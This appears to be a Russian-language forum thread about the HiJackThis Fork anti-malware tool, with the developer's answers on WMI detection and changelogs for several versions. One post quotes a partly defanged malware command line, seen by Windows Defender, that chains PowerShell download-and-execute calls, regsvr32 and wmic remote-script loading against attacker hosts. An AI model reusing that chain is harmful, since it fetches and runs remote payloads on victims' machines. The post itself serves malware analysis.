HiJackThis Fork

HiJackThis Fork и вопросы к разработчикам 2.10.0.23

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,799
Реакции
6,267
Если подсистему WMI не вырезали из системы, то осуществляет. HJT работает не через wmic.exe, а напрямую.
 

thyrex

Ассоциация VN/VIP
VIP
Сообщения
3,245
Реакции
2,660
Спасибо за ответ.

Есть майнер, запуск которого ловит Защитник, но ни в одних логах нет связанных с ним привычных записей WMI. Маскироваться записи могут?
 

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,799
Реакции
6,267
Могут. Пришлите семпл, потом можно будет о чем-то говорить. Через карантин дефендера ведь можно найти тушку и потом оттрейсить из UVs до источника.
 

thyrex

Ассоциация VN/VIP
VIP
Сообщения
3,245
Реакции
2,660
Защитник ловит только запуск (во избежание детекта на форум заменил часть латиницы кириллицей)

CmdLine: C:\Windows\System32\cmd.exe /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8080/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185_26_113_95:8221/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8096/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8204/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi22.hа7455h6fi1.net:8080/рower.txt')||regsvr32 /u /s /i:h__p://hа7455h6fi1.net:8080/s22.tхt scrobj.dll&wmic os get /FORMAT:"h__p://wmi2.hа7455h6fi1.net:8220/s2.хsl
 
Последнее редактирование:

thyrex

Ассоциация VN/VIP
VIP
Сообщения
3,245
Реакции
2,660

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,799
Реакции
6,267
Фильтр без Consumer бесполезен.
HJT не отображает "хвосты" от WMI. Уже несколько раз объяснял.
 

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,799
Реакции
6,267
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.19] - 24.07.2022
- Обновлён белый список служб.
- Некоторые корректировки в O4, чтобы охватывать большее число случаев при отображении постфикса "(Microsoft)".
- O22 - Tasks_Migrated: добавлено определение мигрированных заданий.
- O22 - Tasks: добавлено определение заданий в SysWow64.
- O22 - Tasks: исправлено неверное декодирование не-англоязычных символов xml парсером.

Узнать больше об этом обновлении...
 

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,799
Реакции
6,267
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.20] - 02.08.2022
- Выполнено несколько исправлений AppLocker (спасибо regist за отчёты, аналитику и поддержку):
- O7 - AppLocker: добавлено определение правила "ManagedInstaller".
- O7 - AppLocker: исправлено hash правило, которое отображалось в виде одной записи, вместо нескольких.
- O7 - Applocker: улучшена процедура "Fix all".

Узнать больше об этом обновлении...
 

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,799
Реакции
6,267
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.21] - 28.08.2022
- Добавлены сведения о свободной физической памяти и общей нагрузке на центральный процессор*.
* На слабых процессорах данные о нагрузке могут быть завышены.
- Урезаны метаданные иконок, которые обнаруживались правилами Sigma.
- Исправлены шаблон Hosts и его ACL права до эталонных.
- O22 - добавлены префиксы -32 для 32-битных заданий в 64-битной ОС.
- Инструменты=>Разблокировать файл/папку: Улучшена рекурсивная процедура сброса прав.

Узнать больше об этом обновлении...
 

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,799
Реакции
6,267
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.23] - 03.09.2022
- Контекстное меню: добавлена кнопка "Копировать" - "Аргумент файла".
- Поиск: сохранение последней искомой фразы после закрытия программы.
- Сканер ADS: исправлена работа кнопки "Обзор" (спасибо Alexyz21 за извещение).
- Менеджер деинсталляции программ: исправлено расположение кнопки "Удаление программ".
- Инструмент проверки ЭЦП: Новые кнопки "Добавить папку" и "Очистить список".
- Поправлены переводы.

Узнать больше об этом обновлении...
 
Сверху Снизу